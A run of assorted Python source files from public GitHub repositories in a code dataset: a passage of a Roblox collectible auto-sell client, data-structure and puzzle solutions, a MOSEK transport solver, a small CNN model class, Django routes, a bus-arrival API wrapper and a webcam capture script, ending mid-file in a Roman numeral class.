and mewt_data[\"resellable\"] == True):\n if not item[\"itemTargetId\"] in self.blacklist:\n self.collectable_id_to_name[item[\"collectibleItemId\"]] = item[\"name\"]\n self.id_to_name[item[\"itemTargetId\"]] = item[\"name\"]\n self.collectable_id_to_id[item[\"collectibleItemId\"]] = item[\"itemTargetId\"]\n if not item[\"collectibleItemId\"] in can_resell_collectables:\n can_resell_collectables.append(item[\"collectibleItemId\"])\n elif self.sell_method == \"CUSTOM\":\n item_details = self.fetch_item_details_chunks(list(self.custom_values.keys()))\n for item in item_details:\n mewt_data = self.find_mewtdata_by_id(item[\"itemTargetId\"])\n if(mewt_data and mewt_data[\"resellable\"] == True):\n if not item[\"itemTargetId\"] in self.blacklist:\n self.collectable_id_to_name[item[\"collectibleItemId\"]] = item[\"name\"]\n self.id_to_name[item[\"itemTargetId\"]] = item[\"name\"]\n self.collectable_id_to_id[item[\"collectibleItemId\"]] = item[\"itemTargetId\"]\n if not item[\"collectibleItemId\"] in can_resell_collectables:\n can_resell_collectables.append(item[\"collectibleItemId\"])\n else:\n for assettype in collectable_types:\n inventory_data = self.fetch_inventory(assettype)\n self.raw_inventory.extend(inventory_data)\n\n for raw_item in self.raw_inventory:\n if not raw_item[\"assetId\"] in self.blacklist:\n mewt_data = self.find_mewtdata_by_id(raw_item[\"assetId\"])\n if(mewt_data and mewt_data[\"resellable\"] == True):\n self.collectable_id_to_name[raw_item[\"collectibleItemId\"]] = raw_item[\"assetName\"]\n self.id_to_name[raw_item[\"assetId\"]] = raw_item[\"assetName\"]\n 
self.collectable_id_to_id[raw_item[\"collectibleItemId\"]] = raw_item[\"assetId\"]\n if not raw_item[\"collectibleItemId\"] in can_resell_collectables:\n can_resell_collectables.append(raw_item[\"collectibleItemId\"])\n\n self.logs.append(f\"Found {len(can_resell_collectables)} different collectables that are resellable\")\n for item in can_resell_collectables:\n resellable_data = self.fetch_item_resellable(item)\n total_instance_copies = 0 \n for instance in resellable_data:\n if instance[\"isHeld\"] == False and instance[\"saleState\"] == \"OffSale\":\n if not item in self.inventory:\n self.inventory[item] = []\n self.resellable_count += 1\n total_instance_copies += 1\n self.collectable_instance_id_to_product_id[instance[\"collectibleInstanceId\"]] = instance[\"collectibleProductId\"]\n self.inventory[item].append(instance[\"collectibleInstanceId\"])\n self.logs.append(f\"Loaded all resellable instances for {self.collectable_id_to_name[item]}; Copies: {total_instance_copies}\")\n\n self.logs.append(f\"Successfully updated inventory. Resellable: {self.resellable_count}\")\n\n\n def infinite_thread(self, func, _time):\n def _func():\n while True:\n func()\n time.sleep(_time)\n threading.Thread(target=_func,).start()\n\n\nif __name__ == '__main__':\n Client()\n","repo_name":"workframes/mewtxjava-autosell","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":21005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"19338016549","text":"# memo.py -- file read and write --> ../static/data_docs/memo.pdb\nimport sys, os\n\nos.system('cls')\n\n# [TEST argv] --------------------------------------------------------------\n# <class 'list'> command='1', arg1='2' arg2='3'\n\n# print('sys.argv=',sys.argv) #['memo.py', 'dd','dd']\n# print('len=',len(sys.argv)) #['memo.py', 'dd','dd']\n#\n# for n in range(len(sys.argv)):\n# print('sys.argv[%s]='%n, sys.argv[n]) #['memo.py', 'dd','dd']\n#\n# print(type(sys.argv)) #['D:\\..\\.memo.py', 'dd','dd'] .. include {PATH}\n# print(len(sys.argv)) #f\n#\nDESTIN_DIR='../static/data_doc/'\nMY_MEMO = 'memo.pdb'\n\nHELP_MESSAGE='''\\n\\n\\\n====================================================\n MEMO.PY -- HELP MESSAGE\n---------------------------------------------------\nThis is simple example of read & write file funtion\n\nUSAGE: python memo.py {mode}, [args1]\n=====\n -a --append: ADD Memo = args1\n -v --verbose: VIEW Memo w/o args1\n----------------------------------------------------\n'''\n\nHEADER='''\\n\n====================================================\n %s\n----------------------------------------------------'''\n\n# [ BODY ] --------------------------------------------------------------\n\nif len(sys.argv) < 2:\n print('\\n**** ERR: YOU NEED MORE THAN 1 Argv(option)! 
****')\n print(HELP_MESSAGE)\n raise SystemExit(1) # Exception and forced shutdown.\nelse:\n option = sys.argv[1] # [ argv_list, args1, args2...]\n MESSAGE = \"MEMO OPTION: \"+option\n print(HEADER % MESSAGE)\n\n\nif option == '-h' or option == '--help':\n print(HELP_MESSAGE)\n\nelif option == '-a' or option =='--append': # append mode = -a/\n if len(sys.argv) < 3:\n print(\"*** MISSING ARGV[2] ***\")\n else:\n memo = sys.argv[2]\n f = open(DESTIN_DIR+MY_MEMO, 'a') # append mode open\n f.write(memo+\"\\n\")\n # f.write(\"\\n\")\n f.close()\n\nelif option == '-v' or option=='--verbose': # verbose mode /\n f = open(DESTIN_DIR+MY_MEMO, 'r') # read mode open\n memo = f.read()\n f.close()\n print(memo)\n\nelse:\n print('**** ERR: OPTION is not available! ****')\n","repo_name":"unins/K-Mooc","sub_path":"simple_drill/file_memo_rw.py","file_name":"file_memo_rw.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72662909051","text":"'''\nThis module contains both a Node and a LinkedList class to create a doubly linked list data \nstructure. A Doubly Linked List (DLL) contains an extra pointer, typically called the previous \npointer, together with next pointer and data which are there in singly linked list. \n'''\n# This class consists of a node object with data and a reference to the previous and next nodes\nclass Node:\n # constructor method that sets prev, data, and next values\n def __init__(self, data=None):\n self.prev = None\n self.data = data\n self.next = None\n\n# This class consists of making a linked list out of the Node's class\nclass LinkedList:\n # constructor method that sets an instance of a node object to the head\n def __init__(self, data):\n self.head = Node(data)\n\n # this method adds an element to the beginning of the linked list\n def push(self, data):\n newNode = Node(data)\n if self.head == None:\n return self.head\n current = self.head\n current.prev = newNode\n newNode.next = current\n self.head = newNode\n\n # this method adds an element to the end of the linked list\n def append(self, data):\n newNode = Node(data)\n if self.head == None:\n return self.head\n current = self.head\n while current.next != None:\n current = current.next\n current.next = newNode\n newNode.prev = current\n\n # this method adds an element after the given node data\n def insertAfter(self, node_data, data):\n if self.head == None:\n return self.head\n current = self.head\n newNode = Node(data)\n while current.next != None:\n if current.data == node_data:\n break\n current = current.next\n newNode.next = current.next\n newNode.prev = current\n current.next = newNode\n current.next.prev = newNode\n\n # this method adds a node at a given index\n def insertAt(self, index, data):\n if self.head == None:\n return self.head\n current = self.head\n count = 0\n while current != None:\n if count == index:\n break\n count += 1\n current = current.next\n current.data = data\n\n # this method returns the data of the given index\n def get(self, index):\n if self.head == None:\n return self.head\n count = 0\n current = self.head\n while current.next != None:\n if count == index:\n return current.data\n count += 1\n current = current.next\n return 'Index does not exist!'\n\n # this method deletes a node by the given data\n def deleteNode(self, data):\n if self.head == None:\n return self.head\n current = self.head\n while current.next != None:\n if current.data == data:\n break\n previous = current\n current 
= current.next\n if current == None:\n return\n previous.next = current.next\n current.next.prev = previous\n current = None\n\n # this method deletes a node by the given index\n def deleteIndex(self, index):\n if self.head == None:\n return self.head\n current = self.head\n count = 0\n while current.next != None:\n if count == index:\n break\n count += 1\n previous = current\n current = current.next\n previous.next = current.next\n current.next.prev = previous\n current = None\n\n # this method returns the length of the list\n def length(self):\n length = 0\n if self.head == None:\n return length\n current = self.head\n while current != None:\n length += 1\n current = current.next\n return length\n\n # this method prints the linked list forwards\n def print_foward(self):\n if self.head == None:\n print(\"None\")\n string = \"None<->\"\n current = self.head\n while current != None:\n string += str(current.data) + \"<->\"\n current = current.next\n string += \"None\"\n print(string)\n\n # this method prints the linked list bakwards\n def print_backward(self):\n if self.head == None:\n print(\"None\")\n string = \"None<->\"\n current = self.head\n while current.next != None:\n current = current.next\n tail = current\n while tail != None:\n string += str(tail.data) + \"<->\"\n tail = tail.prev\n string += \"None\"\n print(string)\n \n# Test the Linked List class and methods\nif __name__ == \"__main__\":\n # instance of Linked List object\n ll = LinkedList(10)\n # append(), add a node to the end of the linked list\n ll.append(21)\n ll.append(18)\n # print_forward(), prints the linked list in the forward position\n ll.print_foward()\n # push(), adds a node to the front of the linked list\n ll.push(5)\n ll.push(1)\n ll.print_foward()\n # insertAfter(), allows you to insert a node after a given node\n ll.insertAfter(5, 55)\n ll.print_foward()\n # insertAt(), adds a node at the given index\n ll.insertAt(2, 11)\n ll.print_foward()\n # deleteNode(), deletes a node by its data\n ll.deleteNode(11)\n ll.print_foward()\n # deleteIndex(), deletes the node at the given index\n ll.deleteIndex(1)\n ll.print_foward()\n # print_backward(), prints the linked list in reverse\n ll.print_backward()\n # get(), returns the node data by the given index\n print(ll.get(4))\n print(ll.get(2))\n # length(), return the length of the linked list\n print(\"Length: \" + str(ll.length()))\n'''\nSample Outputs:\n- None<->10<->21<->18<->None\n- None<->1<->5<->10<->21<->18<->None\n- None<->1<->5<->55<->10<->21<->18<->None\n- None<->1<->5<->11<->10<->21<->18<->None\n- None<->1<->5<->10<->21<->18<->None\n- None<->1<->10<->21<->18<->None\n- None<->18<->21<->10<->1<->None\n- Index does not exist!\n- 21\n- Length: 4\n'''","repo_name":"ItsJuanito/DSA-Python","sub_path":"Linked List/DoublyLinkedList.py","file_name":"DoublyLinkedList.py","file_ext":"py","file_size_in_byte":6110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71389545853","text":"from pylearn2.config import yaml_parse\n\ntrain = open('conv.yaml', 'r').read()\ntrain_params = {'train_stop': 50000,\n 'valid_stop': 60000,\n 'test_stop': 10000,\n 'batch_size': 100,\n 'output_channels_h2': 16, \n 'output_channels_h3': 64, \n 'max_epochs': 500,\n 'save_path': '.'}\ntrain = train % (train_params)\ntrain = 
yaml_parse.load(train)\ntrain.main_loop()\n","repo_name":"dsanno/pylearn2_mnist","sub_path":"train_mnist_conv/test_train_conv.py","file_name":"test_train_conv.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"4097407360","text":"# dfs with memorization\n# dp, dynamic programming\n\n# time O(n^2)\n# space O(n^2)\n\nclass Solution:\n def longestPalindromeSubseq(self, s: str) -> int:\n n = len(s)\n memo = dict()\n\n def dfs(l, r):\n nonlocal memo, s\n\n if (l, r) in memo:\n return memo[(l, r)]\n if l > r:\n return 0\n if l == r:\n return 1\n if s[l] == s[r]:\n memo[(l, r)] = dfs(l+1, r-1)+2\n else:\n memo[(l, r)] = max(dfs(l+1, r), dfs(l, r-1))\n\n return memo[(l, r)]\n\n return dfs(0, n-1)\n","repo_name":"boknowswiki/mytraning","sub_path":"lc/python/0516_longest_palindromic_subsequence.py","file_name":"0516_longest_palindromic_subsequence.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"31898530389","text":"import time\n\ndef read_file(filename):\n with open(filename, \"r\") as document:\n doc = [x.strip(\"\\n\") for x in document]\n return doc\n\ndef left_right_idx(str):\n acc = 0\n lst = []\n for i in range(len(str)):\n if str[i] == \"(\":\n acc += 1\n if acc == 1:\n lst.append(i)\n if str[i] == \")\":\n acc -= 1\n if acc == 0:\n lst.append(i)\n return lst\n\ndef operate(expr1, expr2, operation):\n if operation == \"+\":\n return str(int(expr1) + int(expr2))\n if operation == \"*\":\n return str(int(expr1) * int(expr2))\n\ndef result(s):\n s_lst = s.split(\" \")\n eval_lst = [c for c in s_lst if c != \"\"]\n if len(eval_lst) == 1:\n return eval_lst[0]\n while True:\n if len(eval_lst) == 3:\n eval_lst = [operate(eval_lst[0], eval_lst[2], eval_lst[1])]\n break\n eval_lst = [operate(eval_lst[0], eval_lst[2], eval_lst[1])] + eval_lst[3:]\n return eval_lst[0]\n\ndef result_adv(s):\n factor_lst = s.split(\"*\")\n if len(factor_lst) == 1:\n return result(factor_lst[0])\n str_acc = \"1\"\n for factor in factor_lst:\n str_acc = str(int(result(factor))*int(str_acc))\n return str_acc\n\ndef replace_str(str, result_lst, idxs):\n new_str = \"\"\n range_lst = [-1] + idxs\n range_lst.append(len(str))\n for i in range(0, len(range_lst), 2):\n new_str += str[range_lst[i]+1:range_lst[i+1]]\n if i/2 < len(result_lst):\n new_str += result_lst[int(i/2)]\n return new_str\n\ndef eval_expr(str):\n if \"(\" not in str:\n return result(str)\n idxs = left_right_idx(str)\n result_lst = [eval_expr(str[idxs[i]+1:idxs[i+1]]) for i in range(0, len(idxs), 2)]\n new_str = replace_str(str, result_lst, idxs)\n return result(new_str)\n\ndef eval_expr_adv(str):\n if \"(\" not in str:\n return result_adv(str)\n idxs = left_right_idx(str)\n result_lst = [eval_expr_adv(str[idxs[i]+1:idxs[i+1]]) for i in range(0, len(idxs), 2)]\n new_str = replace_str(str, result_lst, idxs)\n return result_adv(new_str)\n\ndef part_1(filename):\n expr_lst = read_file(filename)\n return sum(int(eval_expr(expr)) for expr in expr_lst)\n\ndef part_2(filename):\n expr_lst = read_file(filename)\n return sum(int(eval_expr_adv(expr)) for expr in expr_lst)\n\nif __name__ == \"__main__\":\n filename = input(\"Enter the name of the input file: \")\n start = time.perf_counter()\n print(\"Part 1:\", part_1(filename))\n print(\"Part 2:\", part_2(filename))\n end = time.perf_counter()\n print(\"{:.3f} 
ms\".format((end-start)*100))\n","repo_name":"PabloCandia/advent_of_code","sub_path":"python/2020/day_18/2020-18.py","file_name":"2020-18.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5366266971","text":"import sys\nimport mosek\nimport numpy as np\n\ninf = 0.0\n\ndef streamprinter(text):\n sys.stdout.write(text)\n sys.stdout.flush()\n\ndef main(m, n, cost, mu, nu, asub, aval, solveparam='intpnt'):\n with mosek.Env() as env:\n with env.Task() as task:\n task.set_Stream(mosek.streamtype.log, streamprinter)\n # Bounds on variables\n bkx = [mosek.boundkey.lo for i in range(m * n)]\n blx = [0.0 for i in range(m * n)]\n bux = [+inf for i in range(m * n)]\n # Bounds on Constraints\n bkc = [mosek.boundkey.fx for i in range(m + n)]\n blc = mu + nu\n buc = mu + nu\n # Objective construction\n c = cost\n numvar = m * n\n numcon = m + n\n # Append num of var and cons\n task.appendcons(numcon)\n task.appendvars(numvar)\n \n # Construct obj\n for j in range(numvar):\n task.putcj(j, c[j])\n\n task.putvarbound(j, bkx[j], blx[j], bux[j])\n\n task.putacol(j, asub[j], aval[j])\n \n # Construct constraint\n for i in range(numcon):\n task.putconbound(i, bkc[i], blc[i], buc[i])\n\n # Max or Min\n task.putobjsense(mosek.objsense.minimize)\n\n # Optimizer\n if solveparam == 'intpnt':\n task.putintparam(mosek.iparam.optimizer, mosek.optimizertype.intpnt)\n elif solveparam == 'simplex':\n task.putintparam(mosek.iparam.optimizer, mosek.optimizertype.free_simplex)\n task.optimize()\n\n # Task print\n task.solutionsummary(mosek.streamtype.msg)\n\n # Solution status\n solsta = task.getsolsta(mosek.soltype.bas)\n\n if (solsta == mosek.solsta.optimal or \n solsta == mosek.solsta.near_optimal):\n xx = [0.] 
* numvar\n task.getxx(mosek.soltype.bas, xx)\n print(\"Optimal solution: \")\n for i in range(numvar):\n print(\"x[\" + str(i) + \"]=\" + str(xx[i]))\n elif (solsta == mosek.solsta.dual_infeas_cer or\n solsta == mosek.solsta.prim_infeas_cer or\n solsta == mosek.solsta.near_dual_infeas_cer or\n solsta == mosek.solsta.near_prim_infeas_cer):\n print(\"Primal or dual infeasibility certificate found.\\n\")\n elif solsta == mosek.solsta.unknown:\n print(\"Unknown solution status\")\n else:\n print(\"Other solution status\")\n\nif __name__ == '__main__':\n m = 10\n n = 10\n cost = []\n asub = []\n aval = []\n for i in range(m):\n for j in range(n):\n asub.append([i, m+j])\n aval.append([1.0, 1.0])\n cost.append((i-j)*(i-j))\n mu = np.random.rand(m)\n mu = mu/sum(mu)\n mu = mu.tolist()\n nu = np.random.rand(n)\n nu = nu/sum(nu)\n nu = nu.tolist()\n solveparam = 'intpnt'\n\n try:\n main(m, n, cost, mu, nu, asub, aval, solveparam)\n except mosek.Error as e:\n print(\"ERROR: %s\" % str(e.errno))\n if e.msg is not None:\n print(\"\\t%s\" % e.msg)\n sys.exit(1)\n\n except:\n import traceback\n traceback.print_exc()\n sys.exit(1)\n","repo_name":"yangwenhaosms/cvxopt","sub_path":"moseksolver.py","file_name":"moseksolver.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20301249193","text":"from __future__ import annotations\nfrom typing import List, Tuple\nfrom nptyping import ndarray\n\nimport numpy as np\nimport pickle\nimport time\n\nfrom coolcnn.layers.base_layer import BaseLayer\n\n\nclass Sequential():\n def __init__(self, layers: List[BaseLayer] = []) -> None:\n self._layers = layers\n self._compiled = False\n self._input_array_list = []\n\n def add_layer(self, layer: BaseLayer) -> None:\n self._layers.append(layer)\n\n def compile(self):\n self._compiled = True\n input_shape = self._layers[0].input_shape\n for layer in self._layers:\n layer.input_shape = input_shape\n input_shape = layer.output_shape\n\n def fit(\n self,\n input_array: ndarray, # list of instance\n result_array: ndarray,\n epoch: int = 10,\n mini_batch: int = 2,\n learning_rate: float = 0.5,\n momentum: float = 0,\n ):\n if not self._compiled:\n raise RuntimeError('Error, please compile model first')\n\n self.history = []\n\n step = 0\n mse = 0.0\n acc = 0.0\n\n print()\n print('=====Start Training=====')\n print('Learning rate:', learning_rate)\n print('Epoch:', epoch)\n print('Batch size:', mini_batch)\n print('Momentum:', momentum)\n print('Total training data:', len(input_array))\n print('========================')\n print()\n\n start = time.time()\n total_batch = len(input_array) // mini_batch\n while step < (epoch * len(input_array)):\n print(\n 'Epoch',\n step // len(input_array) + 1,\n ':',\n step % len(input_array) + 1,\n '/',\n len(input_array),\n end='\\r'\n )\n\n data_idx = step % len(input_array)\n res = self.run(input_array[data_idx]).copy()\n\n mse += np.sum((result_array[data_idx] - res)**2)\n res[res < 0.5] = 0\n res[res >= 0.5] = 1\n acc += np.sum(res == result_array[data_idx])\n\n self._backpropagate(result_array[data_idx])\n\n #batch end reached\n if (step + 1) % mini_batch == 0:\n for layer in self._layers:\n layer.update_weight(momentum, learning_rate)\n\n # epoch end reached\n if (step + 1) % len(input_array) == 0:\n print('Epoch', step // len(input_array) + 1)\n print('Elapsed:', '{:.3f}'.format(time.time() - start), 's')\n print(\n 'MSE:', '{:.4f}'.format(mse / len(input_array)), \n 'Acc:', 
'{:.4f}'.format(acc / len(input_array))\n )\n print()\n self.history.append((mse, acc))\n start = time.time()\n mse = 0.0\n acc = 0.0\n step += 1\n\n def summary(self):\n if not self._compiled:\n raise RuntimeError('Error, please compile model first')\n\n total = 0\n for idx, layer in enumerate(self._layers):\n print(\n '{:<5}{:<20}Output Shape: {:<20}Trainable Params: {:<20}'.format(\n str(idx + 1) + '.',\n type(layer).__name__,\n str(layer.output_shape),\n layer.trainable_params,\n )\n )\n total += layer.trainable_params\n print('=' * 92)\n print('Total trainable params:', total)\n\n def run(self, input_array: ndarray) -> ndarray:\n if not self._compiled:\n raise RuntimeError('Error, please compile model first')\n\n for layer in self._layers:\n self._input_array_list.append(input_array)\n input_array = layer.process(input_array)\n\n self._input_array_list.append(input_array)\n return input_array\n\n def _backpropagate(self, target_array: ndarray) -> None:\n predicted_array = self._input_array_list[-1]\n d_error_d_out = -(target_array - predicted_array)\n\n for layer, input_array, output_array in zip(\n self._layers[::-1], self._input_array_list[-2::-1], self._input_array_list[::-1]\n ):\n d_error_d_out = layer.backpropagate(input_array, output_array, d_error_d_out)\n\n self._input_array_list = []\n\n def save(self, save_path: str) -> None:\n with open(save_path, 'wb') as model_out:\n pickle.dump(self, model_out)\n\n @staticmethod\n def load(save_path: str) -> Sequential:\n with open(save_path, 'rb') as model_saved:\n return pickle.load(model_saved)\n","repo_name":"SteveImmanuel/convo-neural-net","sub_path":"coolcnn/models/sequential.py","file_name":"sequential.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33246987037","text":"from typing import List\nfrom collections import Counter\n\n\ndef print_perms(string: str) -> List[str]:\n \"\"\"\n Compute all permutations of a string whoe characters are not necessarily\n unique. The list of permutations should not have duplicates.\n \"\"\"\n result = []\n counter = Counter(string)\n print_perms_helper(counter, \"\", len(string), result)\n return result\n\n\ndef print_perms_helper(counter: Counter, prefix: str, remaining: int,\n result: List):\n \"\"\"\n Helper.\n \"\"\"\n # Base case. 
Permutation has been completed.\n if remaining == 0:\n result.append(prefix)\n return\n # Try remaining letters for next char, and generate remaining permutations.\n for c in counter:\n count = counter[c]\n if count > 0:\n counter[c] -= 1\n print_perms_helper(counter, prefix + c, remaining - 1, result)\n counter[c] = count\n\n\nprint(print_perms(\"hello\"))\n\"\"\"\n[\n 'hello', 'helol', 'heoll', 'hlelo', 'hleol', 'hlleo', 'hlloe', 'hloel',\n 'hlole', 'hoell', 'holel', 'holle', 'ehllo', 'ehlol', 'eholl', 'elhlo',\n 'elhol', 'ellho', 'elloh', 'elohl', 'elolh', 'eohll', 'eolhl', 'eollh',\n 'lhelo', 'lheol', 'lhleo', 'lhloe', 'lhoel', 'lhole', 'lehlo', 'lehol',\n 'lelho', 'leloh', 'leohl', 'leolh', 'llheo', 'llhoe', 'lleho', 'lleoh',\n 'llohe', 'lloeh', 'lohel', 'lohle', 'loehl', 'loelh', 'lolhe', 'loleh',\n 'ohell', 'ohlel', 'ohlle', 'oehll', 'oelhl', 'oellh', 'olhel', 'olhle',\n 'olehl', 'olelh', 'ollhe', 'olleh'\n]\n\"\"\"\n","repo_name":"Onteri/ctci_6th_edition","sub_path":"chapter_8_recursion_dp/python/8.8-permutations_with_dups.py","file_name":"8.8-permutations_with_dups.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25030191121","text":"\"\"\"WS_SpotifyStats URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom WS_SpotifyStats import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('songs/', views.songs_page, name='songs'),\n path('song/<str:id>/', views.song_page, name='song'),\n path('artist/<str:id>/', views.artist_page, name='artist'),\n path('artists/', views.artists_page, name='artists'),\n path('decades/', views.decades, name='decades'),\n path('genre/<str:id>/', views.genre_page, name='genre'),\n path('genres', views.genres_page, name='genres'),\n path('stats/', views.home, name='stats'),\n\n path('admin/', admin.site.urls),\n\n]","repo_name":"MarianaSequeira/WS_SpotifyStats","sub_path":"WS_SpotifyStats/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17565801639","text":"from api import base, enums\nfrom api.filter import Filter\n\n\"\"\"\nEstimateTime (second) [\n當 StopStatus 値為 2 ~ 4 或 PlateNumb 値為 -1 時,EstimateTime 値為 null; \n當 StopStatus 値為 1 時,EstimateTime 値多數為 null,僅部分路線因有固定發車時間,故 EstimateTime 有値; \n當 StopStatus 値為 0 時,EstimateTime 有値。]\n\"\"\"\n\"\"\"\nStopStatus : [0:'正常',1:'尚未發車',2:'交管不停靠',3:'末班車已過',4:'今日未營運']\n\"\"\"\n\n\nclass GetEstimatedTimeOfArrival(base.ApiBase):\n\n def __init__(self, city: enums.Cities, route_name: str):\n super().__init__(f'/v2/Bus/EstimatedTimeOfArrival/City/{city.value}/{route_name}')\n self.api_filter = (Filter('RouteName/Zh_tw') == route_name).get_value()\n\n self._city = city\n self._route_name = route_name\n","repo_name":"allen0099/BusTracker","sub_path":"api/actions/get_estimated_time_of_arrival.py","file_name":"get_estimated_time_of_arrival.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8366109242","text":"\n\ndef logic(s):\n contains_number = any(letter.isdigit() for letter in s)\n\n if contains_number is True:\n # decode\n temp = list()\n\n s_t = list()\n curnum = ''\n for i in range(len(s)):\n if s[i].isdigit():\n curnum = curnum + s[i]\n print(curnum)\n continue\n else:\n s_t.append(curnum)\n s_t.append(s[i])\n curnum = ''\n # print(s_t)\n i = 0\n while(i < len(s_t)):\n\n if s_t[i].isdigit():\n temp.append(s_t[i+1]*(int(s_t[i])-2))\n i += 2\n continue\n temp.append(s_t[i])\n i += 1\n\n print(''.join(temp))\n\n else:\n # encode\n # cur = None\n # count = 0\n # temp = list()\n # for i in range(len(s)):\n # if cur is not None:\n # if cur == s[i]: # cccc\n # count += 1\n # continue\n # temp.append((cur, count))\n\n # cur = s[i]\n # count = 1\n\n # temp.append((cur, count))\n # print(temp)\n\n # ans = list()\n # for x, y in temp:\n # if y == 1:\n # ans.append(x)\n # continue\n # ans.append(str(y+2))\n # ans.append(x)\n # print(''.join(ans))\n\n # simpler way\n con_flag = False\n temp = list()\n count = 1\n # s = 'chheccck'\n for i in range(0, len(s)-1):\n if s[i] != s[i+1] and con_flag is True:\n temp.append(str(count+2))\n temp.append(s[i])\n con_flag = False\n count = 1\n elif s[i] != s[i+1] and con_flag is False:\n temp.append(str(count+2))\n\n temp.append(s[i])\n # con_flag = False\n count = 1\n elif(s[i] == s[i+1]):\n count += 1\n con_flag = True\n # print(temp)\n # print(count)\n if(not con_flag):\n # single letter at last\n temp.append(s[-1])\n else:\n temp.append(str(count+2))\n temp.append(s[-1])\n print(''.join(temp))\n\n\n# s = 
'8A5a3x14m'\ns = 'AAAAAAaaaXMMMMMMMMMMMM'\n# s = 'c4he5ck'\n\nlogic(s)\n","repo_name":"rabin245/hackerrank_interview_prep","sub_path":"lf- encode and decode.py","file_name":"lf- encode and decode.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"30686333005","text":"import numpy as np\nimport pandas as pd\nimport pytest\n\nfrom fpm_universe.pipeline import rolling_validity\n\n\n@pytest.fixture\ndef start_datetime():\n return \"2022-11-01\"\n\n\n@pytest.fixture\ndef last_datetime():\n return \"2022-11-05\"\n\n\n@pytest.fixture\ndef frequency():\n return \"B\"\n\n\n@pytest.fixture\ndef input_values(start_datetime, last_datetime):\n return pd.DataFrame(\n [\n [1, 2, np.nan],\n [np.nan, 5, 6],\n [np.nan, 8, 9],\n [10, 11, np.nan],\n ],\n index=pd.bdate_range(start_datetime, last_datetime, name=\"datetime\"),\n columns=[\"A\", \"AAL\", \"AAPL\"],\n )\n\n\ndef test_rolling_validity(input_values, start_datetime, last_datetime, frequency):\n result = rolling_validity(\n values=input_values,\n threshold_pct=0.5,\n rolling_window=2,\n tolerance_timeframes=0,\n start_datetime=start_datetime,\n last_datetime=last_datetime,\n frequency=frequency,\n )\n expected = pd.DataFrame(\n [\n [True, True, False],\n [True, True, True],\n [False, True, True],\n [True, True, True],\n ],\n index=input_values.index,\n columns=input_values.columns,\n )\n pd.testing.assert_frame_equal(\n expected,\n result,\n )\n","repo_name":"factorpricingmodel/factor-pricing-model-universe","sub_path":"tests/pipeline/test_rolling_validity.py","file_name":"test_rolling_validity.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"42661629339","text":"import cv2\nimport os\n\nimport time\nts = time.time()\n\nimport datetime\nst = datetime.datetime.fromtimestamp(ts).strftime('%d-%m-%Y %H:%M:%S')\n\n#creating folders with timestamp\ndef createFolder(directory):\n try:\n\t\t\n if not os.path.exists(directory):\n os.makedirs(directory)\n except OSError:\n print ('Error: Creating directory. 
' + directory)\n\ncamera = cv2.VideoCapture(0)\ni = 0\nj=1\nfolder='/home/venkatesh/Desktop/IOT Door Security/image capture/captured/'+st\nts = time.time()\n#createFolder(st)\npath=(folder+'/'+st)\nif j==1:\n\tfor i in range (10):\n\t\t# raw_input\n\t\treturn_value, image = camera.read()\n\t\tcreateFolder(folder+'/'+st)\n\t\tcv2.imwrite(path+str(i)+'.png', image)\n\t\ti+=1\n\tdel(camera)\n\n\n\n\n\n","repo_name":"venkatesh1098/FaceRecognitionDoor","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21297452899","text":"import random\nfrom typing import Tuple\n\n\nclass Roman(object):\n\n _symbol = {1: 'I', 5: 'V', 10: 'X', 50: 'L', 100: 'C', 500: 'D', 1000: 'M', 5000: 'V^', 10000: 'X^'}\n _convention = {0: [], 1: [0], 2: [0, 0], 3: [0, 0, 0], 4: [0, 1],\n 5: [1], 6: [1, 0], 7: [1, 0, 0], 8: [1, 0, 0, 0], 9: [0, 2]}\n _basic_romans = {'I': [1, 1], 'II': [1, 2], 'III': [1, 3], 'IV': [1, 4], 'V': [1, 5],\n 'VI': [1, 6], 'VII': [1, 7], 'VIII': [1, 8], 'IX': [1, 9],\n 'X': [10, 1], 'XX': [10, 2], 'XXX': [10, 3], 'XL': [10, 4], 'L': [10, 5],\n 'LX': [10, 6], 'LXX': 